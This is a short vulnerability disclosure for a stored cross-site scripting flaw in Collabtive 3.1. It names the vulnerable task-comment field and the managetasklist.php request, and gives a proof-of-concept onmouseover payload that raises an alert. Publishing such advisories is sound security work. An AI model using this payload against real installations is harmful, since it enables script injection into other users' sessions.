####################################################################

# Exploit Title : Collabtive 3.1 XSS Vulnerability
# Author [ Discovered By ] : Expertt
# Team : Cyber-Warrior.org Bug Researchers Group
# Date : 17/01/2019
# Vendor Homepage : https://webcollab.sourceforge.io/
# Software Download Link : https://sourceforge.net/projects/collabtive/files/collabtive/
# Affected Versions : 3.1
# Tested On : Wampp, Windows,Lampp
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
# Sofrware Descr*iption : Collabtive is web based collaboration software.
# It is an Open Source alternative for proprietary tools like Active Collab or Basecamp.
# Features include: Projects, Instant Messenger, Tasks, Files, Timetracking, Multilanguage, Basecamp import

####################################################################

# Impact :
*********

* This web application called as Collabtive 3.1 version.
* In the Add a new task section, after you add a task, we write and record the XSS vulnerability in the comment section.
* When we want to reorganize the task list, a pop-up window will be displayed showing the XSS vulnerability.
* The proof will be the picture below.
* https://i.hizliresim.com/5aLvL5.png

####################################################################

# PoC :
****************************
* XSS Code : <div/onmouseover=’alert(1)’> style=x:>
* Post Request : target.com/[PATH]/managetasklist.php?action=showtasklist&id=3&tlid=17

####################################################################